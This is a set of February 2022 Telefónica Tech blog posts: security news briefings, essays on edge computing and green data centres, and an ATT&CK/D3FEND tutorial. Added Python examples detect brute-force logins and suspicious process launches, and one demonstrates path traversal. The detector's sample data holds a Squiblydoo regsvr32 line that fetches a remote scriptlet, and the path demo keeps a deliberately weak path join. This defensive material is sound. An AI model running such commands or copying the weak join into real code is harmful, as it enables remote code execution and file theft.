Cyber Security Weekly Briefing 19-25 February

Telefónica Tech    25 February, 2022

New privilege escalation flaw in Linux

Security researchers at Qualys have discovered seven flaws in Canonical’s Snap software packaging and deployment system used in operating systems that use the Linux kernel. The most severe of these vulnerabilities, listed as CVE-2021-44731 and reportedly receiving a CVSSv3 of 7.8, is a privilege escalation flaw in the snap-confine function, used internally by the snapd tool to build the execution environment for snap applications. Successful exploitation could allow any unprivileged user to gain root privileges on the vulnerable host. The flaw was communicated to vendors and open-source distributions as soon as it was discovered last October, leading to a coordinated patch release process on 17 February. Qualys technicians have also developed an exploit for this issue that allows full root privileges to be obtained on default Ubuntu installations. The other six vulnerabilities identified are: CVE-2021-3995, CVE-2021-3996, CVE-2021-3997, CVE-2021-3998, CVE-2021-3999 and CVE-2021-44730.

All the details: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731

Conti ransomware operators take over TrickBot operations

Researchers at Advanced Intelligence have published a report indicating that management of the TrickBot malware has passed to the Conti ransomware operators. AdvIntel’s experts have analysed the background of TrickBot, noting its historically close relationship with the ransomware and the latter’s subsequent rise to prominence. Conti has relied, among other factors, on maintaining a code of conduct among its operators, which has allowed it to thrive and remain active while other ransomware groups have been dismantled by various law enforcement operations. Experts suggest that TrickBot gradually became a subsidiary of Conti’s operators, as they were the only ones to use it in their operations. Also, by the end of 2021, Conti had absorbed multiple TrickBot developers and operators. However, it is worth noting that, since TrickBot’s infrastructure is reportedly easily detected, Conti operators have begun to replace it with the BazarBackdoor malware, which Conti itself develops and uses to gain initial access to its victims’ networks.

More: https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works

Cobalt Strike distributed on vulnerable MS-SQL servers

Analysts at ASEC have discovered a new campaign in which vulnerable Microsoft SQL (MS-SQL) servers exposed to the internet are being attacked by malicious actors with the goal of distributing Cobalt Strike on the compromised hosts. The attacks on MS-SQL servers include attacks on environments where the vulnerability has not been patched, as well as brute-force and dictionary attacks against poorly managed servers. First, the malicious actor scans port 1433 to check whether MS-SQL servers are open to the public, and then carries out brute-force or dictionary attacks against the administrator account in order to log in. Malware such as Lemon Duck also scans this port and propagates through it in order to move laterally within the internal network. The attacks culminate in the decryption of the Cobalt Strike executable, followed by its injection into the legitimate Microsoft Build Engine (MSBuild) process, which has been abused in the past by malicious actors to deploy remote access trojans and credential-stealing malware. Finally, it is worth noting that the version of Cobalt Strike running in MSBuild.exe comes with additional settings to evade detection by security software.

All the details: https://asec.ahnlab.com/en/31811/
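The brute-force stage of the campaign above is the part a defender can catch earliest: SQL Server writes every failed login (error 18456) to its ERRORLOG with the account tried and the client address, so a burst of failures from one address within a short window is the signal to alert on. The following Python is an added example, not code from ASEC or from this briefing; the log lines are constructed in the ERRORLOG style, and the addresses, account names, threshold and window are illustrative assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the style of a SQL Server ERRORLOG (error 18456 'Login failed'
# entries). Addresses and account names are illustrative, not observed data.
SAMPLE_LOG = """\
2022-02-20 10:15:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-20 10:15:03.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-20 10:15:05.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2022-02-20 10:15:07.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-20 10:15:09.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2022-02-20 10:15:11.55 Logon       Login failed for user 'administrator'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2022-02-20 10:15:20.00 Logon       Login failed for user 'dbuser'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
2022-02-20 10:16:30.00 Logon       Login succeeded for user 'appuser'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.12]
2022-02-20 10:20:30.00 Logon       Login failed for user 'dbuser'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
"""

# Timestamp, the 'Logon' source, the failing account and the client address.
FAILED_LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(text):
    """Return (timestamp, user, client) tuples for every failed-login line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGIN_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["user"], m["client"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failures per client address.

    An alert is opened for a client once `threshold` failures fall inside `window`
    and is then kept up to date with later failures. The alert records the accounts
    tried, which distinguishes password guessing against one login from user enumeration.
    """
    recent = defaultdict(deque)  # client -> deque of (ts, user) still inside the window
    alerts = {}
    for ts, user, client in sorted(events):
        q = recent[client]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(client, {"first": q[0][0], "last": ts, "count": 0, "users": set()})
            a["last"] = ts
            a["count"] = max(a["count"], len(q))
            a["users"].update(u for _, u in q)
    return alerts


if __name__ == "__main__":
    for client, a in detect_bruteforce(parse_failed_logins(SAMPLE_LOG)).items():
        print(f"{client}: {a['count']} failures between {a['first']:%H:%M:%S} and "
              f"{a['last']:%H:%M:%S}, accounts tried: {sorted(a['users'])}")
```

On the constructed sample only 203.0.113.5 crosses the threshold (six failures in ten seconds, across `sa`, `admin` and `administrator`); the two failures from 198.51.100.7 are five minutes apart and stay below it. The same logic applies unchanged to Windows Security event 4625 once the timestamp, account and source-address fields have been extracted.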

Life at the border

Emilio Moreno    23 February, 2022

Today’s article is not going to be about cowboy movies, nor about the Limes of the Roman Empire, nor about Radio Futura’s song even though it may seem like it. But I am going to take advantage of the Far West pun to introduce some more Edge Computing concepts.

When we talk about the concept of Edge Computing, as we have already mentioned on other occasions, we are referring to the concept of taking computing to the edge, from distant Data Centres to a point close to where the information that needs to be processed is generated. Telefónica, which has the DNA of a Telco, believes that the edge is the edge of our network, and we believe that our customers can benefit enormously from us bringing computing capabilities closer to that point.

Comparing the edge to the border, and in a similar way to what has happened throughout history, borders have not always been clearly defined. In Roman times, the Rhine and Danube rivers or Hadrian’s Wall clearly delimited part of the northern border. Others, such as the Far West, gradually changed over time.

In the case of our Edge, the terms Far Edge and Near Edge are becoming popular. And what they indicate is where that edge is, referring to how close or far it is from the Data Centres where computing has traditionally been based.

Near Edge usually refers to locations closer to Data Centres, typically located in Carrier Centrals, which are served by fibre connectivity. That is, with a relatively limited number of locations.

With Far Edge, the distance from the Data Centre is much greater, the density of locations increases and we can be talking about cabinets on the street, on mobile phone towers and even in customer premises.

If latency is key in the world of Edge Computing, as we have commented on other occasions, and the objective is to achieve the lowest possible values, we could think that the logical thing to do is to bet exclusively on a Far Edge strategy, in which we will almost certainly obtain lower latencies.

But life at the edge is not easy. And the further out we go, the greater the challenges. In typical Far Edge locations, the environmental conditions are more difficult, in terms of power supply, temperature, air conditioning, possibility of vandalism, etc. This means more complexity in the management of the infrastructure, and a challenge to offer service levels equivalent to those of traditional infrastructures. With these needs in mind, computer hardware manufacturers are launching new product lines specifically designed for this type of environment. When it comes to on-premises deployments, the challenge is often to find locations that meet the minimum conditions to install them.

In the case of the Near Edge, these problems are not so significant because we are starting from facilities that already have the minimums: energy, air conditioning and connectivity. We will not have all the advantages of a traditional Data Centre, but we will be close. Life is a little simpler.

So, what type of Edge will predominate in the future? The answer will depend on the requirements of the use cases that are currently being tested and turned into commercial services and applications. If latency requirements are extremely low, the Far Edge will probably be more prevalent. If not, the Near Edge will be able to meet the needs of most use cases, with better cost and flexibility.

Odds are open now…


Green data centers: fighting climate pollution from Internet use

Paloma Recuero de los Santos    22 February, 2022

Do you have any idea how the Internet affects the environment? According to World Bank data, 48.5% of the world’s population was already connected to the Internet in 2017 (of course very unevenly, from 1% in countries like Eritrea to 98% in the most developed countries). And the number is growing steadily. So much so that, since January 2018, the number of people who have connected to the Internet for the first time has increased by 9%, reaching 4.39 billion users in 2019. Let’s see how this impact is generated and what we can do to reduce it as much as possible.

Figure 1: Evolution of the percentage of the world's population connected to the Internet (World Bank)

Data

One of the most easily identifiable consequences of this exponential growth is the parallel generation of large volumes of data. In fact, the level of data generated each week worldwide exceeds that accumulated in the last 1000 years of human history.

The growing demand for data exchange and the volume of information stored in the cloud has raised the need to build ever-larger storage and processing spaces. These facilities, which operate 24 hours a day, 7 days a week, and under very specific temperature and humidity conditions, can consume more energy than large countries. And their number is growing every day.

In fact, the company Cisco Systems estimates that the number of hyperscale data centers in the world will increase from 259 in 2015 to 485 by 2020.

Devices

In addition to the implications derived from the unstoppable growth of data, there are others that could pass unnoticed.

Talking about devices, on one hand, we must take into account the impact of their manufacture, both in terms of the use of very specific raw materials and energy resources, as well as the way in which we dispose of them when they are no longer useful (technological waste). Moreover, other “contributions” related to transportation, logistics, etc. should be added.

Can the impact of internet use on our environment be somehow measured? The answer is “yes”, and to do so, what we do is to quantify its carbon footprint.

What is the carbon footprint of the Internet?

The carbon footprint is a way of quantifying the greenhouse gas emissions released into the atmosphere as a result of a given activity. It is used as a tool to raise awareness of the impact of each activity on global warming.

And yes, it is possible to calculate the carbon footprint generated by each email sent (a high percentage of which is unwanted), each tweet, each Google search, each photo uploaded to a social network…

This revealed that data centers are one of the most polluting industries in the world. So much so that, if we do nothing to prevent it, the impact of ICT industries on the generation of greenhouse gases could reach values equivalent to 50% of the impact generated by the use of fossil fuels in the transport sector by 2040.

Information and communication technology (ICT) equipment and services consume more than 8% of the EU’s electrical energy and produce around 4% of its CO2 emissions. These figures could double by 2020.

European Commission Digital Agency (September 2010)

That is why, despite being a great challenge, the EU has set out a voluntary Code of Conduct to improve the efficiency of data centers and reduce energy consumption since 2008, which many companies have already joined.

How can we reduce the effect of ICT on global warming?

As individuals, we can take actions such as unsubscribing from newsletters that do not interest us, avoiding what is known as “latent pollution”, due to the unnecessary storage of e-mails. We can also reduce our queries to Google, and avoid spending hours watching videos of kittens on Youtube or connected to social networks.

In short, making responsible use of the Internet, being aware that each of these actions is a drop in the ocean, yes, but it is a sum and follows the overall balance, and we are many millions of people who “play our part”.

However, the lion’s share lies in achieving more efficient and environmentally friendly data centers: the “green datacenters” or “green” data centers.

Green datacenters

In 2017, Greenpeace USA produced a report “Clicking Clean: Who’s Winning the Race to Create a Green Internet 2017?” that analyzed the energy footprints of the largest data centers and nearly 70 of the world’s most popular sites and apps and explained the situation in a didactic video:

The report urged the major Internet companies to stop using outdated and polluting “dirty” energies, and to start covering their energy needs 100% with renewable energies such as hydro and wind sources.

As a result of this interest, green data centers emerged, which are those that adopt sustainable technological solutions that contribute to improving energy efficiency and, therefore, to economic and environmental sustainability.

The environmental conditions in some countries such as Ireland, Norway, Iceland, Sweden, etc. have turned them into true “superpowers” of green data centers.

For example, in Norway, energy-efficient and sustainable data centers are built next to fjords. They use cooling systems that carry water, at 8ºC, from the fjord to the station without using electrical energy, only with the help of gravity, and without the need to use refrigerant gases, which ensures that it is a sustainable plant with zero emissions.

In other cases, data centers are built underground, such as the Lefdal Mine Datacenter, which, located in a former mine at a depth of more than 600 meters, obtains its energy supply from a nearby hydroelectric power station; or even underwater, such as Microsoft’s Natick project in the Shetland Islands.

Conclusion

The information and communication technologies (ICT) sector must be a pioneer in the adoption of sustainable technological solutions that contribute to improving energy efficiency and, therefore, to economic and environmental sustainability.

One of the main advances towards this sustainability is the evolution of traditional data centers towards “hyperscale” data centers. These centers achieve significant savings in energy consumption by using large arrays of commodity servers designed for specific tasks instead of conventional servers, and by adopting the latest advances in cooling.

On the other hand, companies such as Google have achieved significant reductions in the energy consumption of their data centers by optimizing the use of their cooling systems using artificial intelligence algorithms.

Finally, we cannot forget that many start-ups and large companies such as Intel and AMD are developing semiconductors to manufacture new microchips based on technologies such as photonics to power neural networks and other artificial intelligence tools that consume much less energy.

In short, while technological progress poses significant challenges to environmental conservation, at the same time, every day, it offers new solutions.

Read the original post in Spanish here.


Cyber Security Weekly Briefing 12-18 February

Telefónica Tech    18 February, 2022

Researchers develop exploit for critical vulnerability in Magento

Positive Technologies’ offensive security team has developed a Proof of Concept (PoC) for the CVE-2022-24086 CVSSv3 9.8 vulnerability, claiming that it would allow control of the system to be gained with web server permissions. However, the researchers have stated that they do not intend to release this exploit either publicly or privately to other industry analysts. This critical vulnerability affecting Adobe Commerce and Magento Open Source was fixed by Adobe last Sunday in a security update. Exploiting this flaw would allow an unauthenticated attacker to execute arbitrary code remotely, although it is worth noting that, despite not requiring authentication, it can only be exploited by an attacker with administrator privileges. The flaw affects Magento Open Source and Adobe Commerce versions 2.4.3-p1 and 2.3.7-p2 and earlier, with the exception of Adobe Commerce versions prior to 2.3.3.3. Also yesterday, Adobe updated this security bulletin to add a new flaw, CVE-2022-24087, also of the Improper Input Validation type, which also has a CVSSv3 score of 9.8 and would allow an unauthenticated attacker to execute arbitrary code remotely. It is recommended to patch both critical vulnerabilities as soon as possible.

More info: https://helpx.adobe.com/security/products/magento/apsb22-12.html

0-day in Chrome being actively exploited

Google released fixes for eight security flaws in the Google Chrome browser on Monday, including a high-criticality vulnerability that is being actively exploited. This use-after-free vulnerability resides in the animation component, has been identified as CVE-2022-0609 and, if successfully exploited, would allow an attacker to execute arbitrary code remotely, as well as alter legitimate information. Google has also addressed four other high-criticality vulnerabilities of the use-after-free type that affect the file manager, ANGLE, GPU and Webstore API, as well as a heap buffer overflow vulnerability in Tab Groups and an inappropriate implementation in the Gamepad API. Google recommends updating Google Chrome to version 98.0.4758.102 to fix these bugs.

Discover more: https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html

TA2541 campaign persistent over time

Researchers at Proofpoint have published a new paper attributing a long-running, persistent attack campaign to the TA2541 group. The campaign targets the aviation, aerospace, transportation, manufacturing and defence sectors in North America, Europe and the Middle East. The activity of this group dates back to 2017 and, since that year, they have used TTPs that have been maintained over time. The usual entry vector identified is an English-language phishing campaign using aviation, transport or travel-related subjects. They do not take advantage of current events as other groups often do, although they have occasionally mixed their usual subjects with current ones such as COVID-19. These emails include attachments that download the payloads of different RATs, mainly families that can be easily acquired in cybercrime forums, with AsyncRAT, NetWire and WSH RAT standing out above the rest. The group has recently refined its campaigns and is no longer sending payloads as attachments, but through links included in the emails that point to cloud services.

All details: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

Classified US information exfiltrated by Russian actors

CISA has published a security advisory warning of a cyber espionage campaign dating back to at least January 2020. According to the warning, Russian threat actors have compromised and exfiltrated information from US-authorised defence contractors (CDC), private entities that are authorised to access highly sensitive information in order to bid for contracts, access information in the areas of intelligence, armaments, aircraft, information technology, among others. Among the techniques used as an entry vector, the attackers would have used spearphishing campaigns, credential harvesting, brute force techniques, password spraying or the exploitation of vulnerabilities. Once the companies had been compromised, the attackers managed to establish persistence in some of them for at least six months, thus enabling Russia to obtain strategic information with which it could have established military priorities, strategic plans and accelerated software development.

More info: https://www.cisa.gov/uscert/ncas/alerts/aa22-047a

A practical approach to integrating MITRE’s ATT&CK and D3FEND

Diego Samuel Espitia    16 February, 2022

Businesses have become aware of the need to have mechanisms in place to ensure the protection of their information and how important it is to understand their weaknesses in order to improve their resilience in the event of a cyber incident. Although many managers continue to see security as the need to have elements designed to protect and minimise the possibility of an attack, this is no longer the case. Cybersecurity is an ongoing process that requires understanding the adversaries and the risks in the environment.

MITRE’s ATT&CK, which we have discussed on previous occasions in our blog, was born with this philosophy in 2013, seeking to compile in a matrix the techniques, tactics and procedures used by attackers in real actions against business, mobile and industrial environments. Its evolution has since led to the creation of a matrix of defensive capabilities and countermeasures, called D3FEND.

MITRE states that “cyber threat intelligence is about knowing what adversaries are doing and then using that information to improve decision making”, so regardless of the size of the cybersecurity team, this tool is vital in the process of ensuring information security. With it, it is possible to associate the techniques of the main criminal groups with iconic incidents in different industries, validate which adversaries are common to a sector and know the software used in each phase of an attack, among many other capabilities it provides.

Companies that are just starting out and have few resources in the area can begin by understanding the usual behaviour of the adversaries in their industry, and with this data validate whether the defences implemented detect and mitigate the actions of these groups. To understand how this analysis is done, let’s take the example of a logistics company, a sector which has recently been the victim of several ransomware attacks around the world.

1. Find your sector. Determine the sector of the industry that the business is focused on. For this purpose, the website provides a search engine at the top. Here we will enter “logistics” for the example.

Figure 1: Search result in https://attack.mitre.org/groups/

For the analysis we will take the Cuba ransomware, which we mark in the illustration. It is one of the most widely used against medium-sized companies in Latin America.

2. Adversary information. Once the software or group to be analysed is selected, access is gained to the information provided by the system, such as basic data on the platform being attacked, when it was detected, who detected it and the victim industries.

Figure 2: Adversary information

3. Know the techniques. This same adversary page shows the techniques that have been detected in attacks where this malware has been used in a list that enumerates the techniques and sub-techniques used.

Figure 3: Techniques used by Cuba in an attack.

Right there in the “Navigator Layers” it gives the possibility to see within the matrix what the tactics and their techniques are.

Figure 4: Visualisation of tactics and techniques used by Cuba.

In this case, it can be seen that the techniques used by the adversary groups to initiate the attack are unknown or not reflected, which is called pre-attack in the matrix. This usually indicates that the techniques used are too varied to establish a specific one.

4. Know the defences. Each of the techniques has a section listing the possible forms of detection that should be implemented to mitigate this action. For the example we will look at a sub-technique used in the execution tactic, and which is usually the first step detected by incident response investigators in ransomware attacks.

Figure 5: Technique to be analysed, because it shows us a command.

Adversaries use the Windows command console to execute programmes inside the victim machine. In the specific case of Cuba, the cmd.exe /c command has been detected in several of the activities analysed.

By accessing the information on the technique, we have the basic data collected on how it has been used, some of the procedures where it has been detected, possible mitigations and ways of detecting its execution. For our example case we will look directly at the information and the possible ways to detect it.

Figure 6: T1059.003 Technique data
Figure 7: Detection recommendations for T1059.003

With this information, the cybersecurity team can make decisions on how to act to prevent an incident that uses this software to affect their industry sector.

They can even reference the technique to search the defence matrix for more information on how to protect themselves. Go to https://d3fend.mitre.org/ and in the search engine called ATT&CK lookup enter the technique, for our example T1059.003.

Figure 8: Relation with defence matrix.

This shows the map of the forms of defence and detection, and for our example these are as follows.

Figure 9: Defence map for T1059.003

In short, this tool is invaluable for all types of businesses and cybersecurity teams, providing information and data to make decisions in the pursuit of better cyber resilience.

Cyber Security Weekly Briefing 5 – 11 February

Telefónica Tech    11 February, 2022

Microsoft disables macros and MSIX to prevent malware distribution

Microsoft has been actively mobilising against multiple malware attacks that use some of its technologies as an entry vector. The products affected in particular are the Office suite and the MSIX application installers that allow developers to distribute applications for different platforms. In the case of Office, the company will disable Visual Basic for Applications (VBA) macros by default in all its products, including Word, Excel, PowerPoint, Access and Visio, for documents downloaded from the web, although they can be enabled voluntarily by the user. According to Microsoft’s own publication, enabling macros in an Office file allows threat actors to deliver malicious payloads, deploy malware, compromise accounts, exfiltrate information and even gain remote access to targeted systems. The move comes just a month after the Windows vendor disabled Excel 4.0 (XLM) macros by default, another feature that is widely abused to distribute malware. Regarding MSIX application installers, Microsoft has announced that it will temporarily disable the MSIX ms-appinstaller protocol driver in Windows after evidence of active exploitation of vulnerability CVE-2021-43890, which allows the installation of unauthorised applications and is being used to deliver malware such as Emotet, TrickBot and Bazaloader. This move means that, until Microsoft fully fixes the bug, App Installer will not be able to install an app directly from a web server, so users must first download the app to their device and then install the package with the app installer.

More: https://docs.microsoft.com/es-es/DeployOffice/security/internet-macros-blocked

Possible exfiltration of information due to vulnerability in Argo CD

Researchers at Apiiro have disclosed a vulnerability in Argo CD, a widely used tool for deploying applications in Kubernetes, which could be exploited by attackers in order to obtain sensitive information from different organisations, especially passwords and API keys. The vulnerability has been catalogued with the identifier CVE-2022-24348 (CVSSv3 7.7) and consists of a path-traversal flaw that could lead to privilege escalation, information disclosure and lateral movement attacks. Exploitation is achieved by loading a YAML file specially crafted as a Kubernetes Helm Chart on the target system, as long as the attacker has permission to create and update applications and knows the full path to a file containing valid YAML. For its part, Argo CD released version 2.3.0-rc4 last Friday, just 5 days after Apiiro researchers alerted them to the bug.

All the details: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/
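The class of weakness described above is a path check that does not hold: a caller-supplied file path is joined onto a base directory and the result is trusted, so `..` segments, an absolute path or a symlink planted inside the tree can point the read at a file the caller was never meant to reach. The following Python is an added illustration of that pattern in general, not Argo CD’s code and not a reproduction of CVE-2022-24348. It contrasts a naive join with a resolver that canonicalises the path (following symlinks) and rejects anything that lands outside the chart directory. The directory layout, file names and the `/etc/hostname` request are constructed for the demo.

```python
import os
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a requested path escapes the permitted base directory."""


def vulnerable_resolve(base_dir: str, requested: str) -> str:
    """The weak pattern: a plain join trusts the caller-supplied relative path,
    so '..' segments or an absolute path walk straight out of base_dir."""
    return os.path.normpath(os.path.join(base_dir, requested))


def safe_resolve(base_dir: str, requested: str) -> Path:
    """Hardened form: canonicalise both sides (symlinks included) and accept the
    result only if it still lies inside base_dir."""
    root = Path(base_dir).resolve()
    # An absolute 'requested' replaces root in the join; the containment check catches it.
    candidate = (root / requested).resolve()
    if candidate != root and root not in candidate.parents:
        raise PathTraversalError(f"{requested!r} resolves to {candidate}, outside {root}")
    return candidate


def build_demo_tree(tmp: Path) -> Path:
    """Constructed layout: a chart directory plus a secret that must stay unreachable."""
    chart = tmp / "charts" / "app"
    chart.mkdir(parents=True)
    (chart / "values.yaml").write_text("replicaCount: 1\n")
    (tmp / "secret.yaml").write_text("apiKey: PLACEHOLDER-NOT-A-REAL-KEY\n")
    # A symlink inside the chart that points outside of it: lexical checks miss this.
    (chart / "values-link.yaml").symlink_to(tmp / "secret.yaml")
    return chart


def run_demo() -> dict:
    """For each request, report whether the hardened resolver accepted it and
    whether the naive join would have left the chart directory."""
    results = {}
    with tempfile.TemporaryDirectory() as td:
        tmp = Path(td).resolve()
        chart = build_demo_tree(tmp)
        requests = ["values.yaml", "../../secret.yaml", "values-link.yaml", "/etc/hostname"]
        for req in requests:
            naive = Path(vulnerable_resolve(str(chart), req)).resolve()
            naive_escaped = naive != chart and chart not in naive.parents
            try:
                safe_resolve(str(chart), req)
                accepted = True
            except PathTraversalError:
                accepted = False
            results[req] = {"safe_accepted": accepted, "naive_escaped": naive_escaped}
    return results


if __name__ == "__main__":
    for req, r in run_demo().items():
        print(f"{req:<20} naive_escaped={r['naive_escaped']!s:<5} safe_accepted={r['safe_accepted']}")
```

Only `values.yaml` passes the hardened check; the `..` walk, the symlink and the absolute path all resolve outside the chart directory and are rejected, while the naive join lets each of them through. The check runs on the resolved path rather than on the string, which is what defeats the symlink case.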

Critical vulnerabilities in SAP products

SAP has released its February security bulletin issuing 22 major updates, including fixes for the Log4j impact, as well as three critical memory corruption vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP’s business applications. These last three flaws were discovered by SAP’s product security response team, in collaboration with Onapsis Research Labs, who have named them “ICMAD” (Internet Communication Manager Advanced Desync). The most critical vulnerability, already patched in SAP Security Note 3123396, is identified as CVE-2022-22536 and has a CVSSv3 of 10.0; it would allow an unauthenticated attacker to prepend a victim’s request with arbitrary data and thereby execute functions impersonating the victim. The remaining two bugs have also been patched by SAP in its security advisory 3123427 and correspond to CVE-2022-22532 and CVE-2022-22533, with CVSSv3 scores of 8.0 and 7.5 respectively. Both of these would also be exploitable by an unauthenticated remote attacker, although they only affect SAP applications running on SAP NetWeaver AS Java. It should be noted that successful exploitation of these vulnerabilities could result in severe impacts such as theft of confidential information, ransomware and disruption of business processes and operations. SAP recommends applying SAP’s February 2022 security updates as soon as possible, as well as making use of the open source tool provided by Onapsis that identifies whether a system is vulnerable and in need of patching.

Discover all: https://onapsis.com/blog/sap-security-patch-day-february-2022-severe-http-smuggling-vulnerabilities-sap-netweaver

Microsoft security updates

Microsoft has fixed a vulnerability in Microsoft Defender antivirus on Windows that allowed attackers to distribute and execute payloads unnoticed by the malware detection engine. The flaw is due to a loosely configured registry key containing the list of locations excluded from Microsoft Defender scanning, which was readable by all users. After remediation it is visible only to users with administrator privileges. This security bug affected the latest versions of Windows 10 and would have been fixed with Microsoft’s latest security updates in February. It is also worth noting that Microsoft is removing the Windows Management Instrumentation Command-line (WMIC) tool, wmic.exe, from the developer channel in the latest versions of Windows 11, in favour of PowerShell. The removal only affects the command-line tool, so WMI itself is not affected. WMIC has been widely exploited by malicious actors and is even considered a LOLBin (living-off-the-land binary). By removing the WMIC utility, multiple attacks and malware will no longer function properly, as they will no longer be able to execute some commands necessary to carry out their operations, although it is possible that attackers will replace WMIC with new methods.

More info: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-defender-flaw-letting-hackers-bypass-antivirus-scans/

Cybercriminals exploiting Windows Regsvr32 utility to distribute malware

Researchers at Uptycs have analysed a new campaign in which malicious actors are increasingly abusing a Windows LOLBin known as Regsvr32 to spread malware. LOLBins are legitimate, native utilities commonly used in computing environments that cybercriminals exploit to evade detection by blending in with normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed utility in Windows that allows users to manage code libraries and register DLL files by adding information to the central directory (registry) so that it can be used by Windows and shared between programs. According to Uptycs, the utility is being abused through a technique known as Squiblydoo, where Regsvr32 is used to execute DLLs via COM scriptlets that do not make any changes to the registry. The research adds that malicious use of this utility has been on the rise lately, mainly in the registry of .OCX files hosted in various malicious Microsoft Office documents. Uptycs has analysed up to 500 malware samples that are reportedly being distributed, some of them belonging to Qbot and Lokibot.

All the details: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents
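Both the T1059.003 walk-through in the ATT&CK/D3FEND post above and the Regsvr32 item here come down to the same detection recommendation: record process creation with the full command line and use the parent process as context. The following Python is an added example that is not from either post, from MITRE or from Uptycs. It parses constructed Sysmon-style process-creation events and maps matches to ATT&CK technique IDs: `cmd.exe /c` (T1059.003, the pattern the post notes for Cuba) and regsvr32 invoked with a scriptlet rather than a DLL to register (T1218.010, Regsvr32 proxy execution, named as ATT&CK listed it at the time). The event format, field names, paths, the Office-parent severity rule and the URL are assumptions for the demo.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style ('|'-separated
# key=value fields). Hosts, paths and the URL are illustrative, not captured data.
SAMPLE_EVENTS = r"""
EventID=1|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c dir C:\Users|ParentImage=C:\Windows\explorer.exe
EventID=1|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c whoami|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
EventID=1|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s /u /i:http://example.invalid/a.sct scrobj.dll|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
EventID=1|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"|ParentImage=C:\Program Files\Vendor\setup.exe
EventID=1|Image=C:\Windows\System32\conhost.exe|CommandLine=\??\C:\Windows\system32\conhost.exe 0x4|ParentImage=C:\Windows\System32\svchost.exe
"""

# ATT&CK IDs and names (names as listed by ATT&CK at the time of the post).
TECHNIQUES = {
    "T1059.003": "Command and Scripting Interpreter: Windows Command Shell",
    "T1218.010": "Signed Binary Proxy Execution: Regsvr32",
}

# Parents that should rarely spawn a shell or a scriptlet-running regsvr32;
# an Office parent raises the severity (an assumption for this demo).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def parse_events(text):
    """Turn the '|'-separated lines into dicts, keeping only process-creation events."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(part.split("=", 1) for part in line.split("|"))
        if fields.get("EventID") == "1":
            events.append(fields)
    return events


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def make_finding(technique_id, severity, ev):
    return {
        "technique": technique_id,
        "name": TECHNIQUES[technique_id],
        "severity": severity,
        "image": basename(ev.get("Image", "")),
        "parent": basename(ev.get("ParentImage", "")),
        "command": ev.get("CommandLine", ""),
        # ATT&CK page for the technique; D3FEND's "ATT&CK lookup" takes the same ID.
        "reference": "https://attack.mitre.org/techniques/" + technique_id.replace(".", "/") + "/",
    }


def classify(ev):
    """Apply the two command-line rules to one event and return zero or more findings."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    findings = []
    # T1059.003: the Windows command shell run with /c, as in the Cuba walk-through.
    if image == "cmd.exe" and re.search(r"(^|\s)/c(\s|$)", cmd):
        severity = "high" if parent in OFFICE_PARENTS else "low"
        findings.append(make_finding("T1059.003", severity, ev))
    # T1218.010: regsvr32 pointed at a scriptlet (scrobj.dll or /i:<url>) instead of a
    # DLL it is registering; a plain '/s <path>.dll' registration is left alone.
    if image == "regsvr32.exe" and ("scrobj.dll" in cmd or re.search(r"/i:\s*https?://", cmd)):
        findings.append(make_finding("T1218.010", "high", ev))
    return findings


def run_detection(text):
    """Parse the log text and return all findings in event order."""
    return [f for ev in parse_events(text) for f in classify(ev)]


if __name__ == "__main__":
    for f in run_detection(SAMPLE_EVENTS):
        print(f"{f['technique']} {f['severity']:<4} parent={f['parent']:<12} {f['command']}")
```

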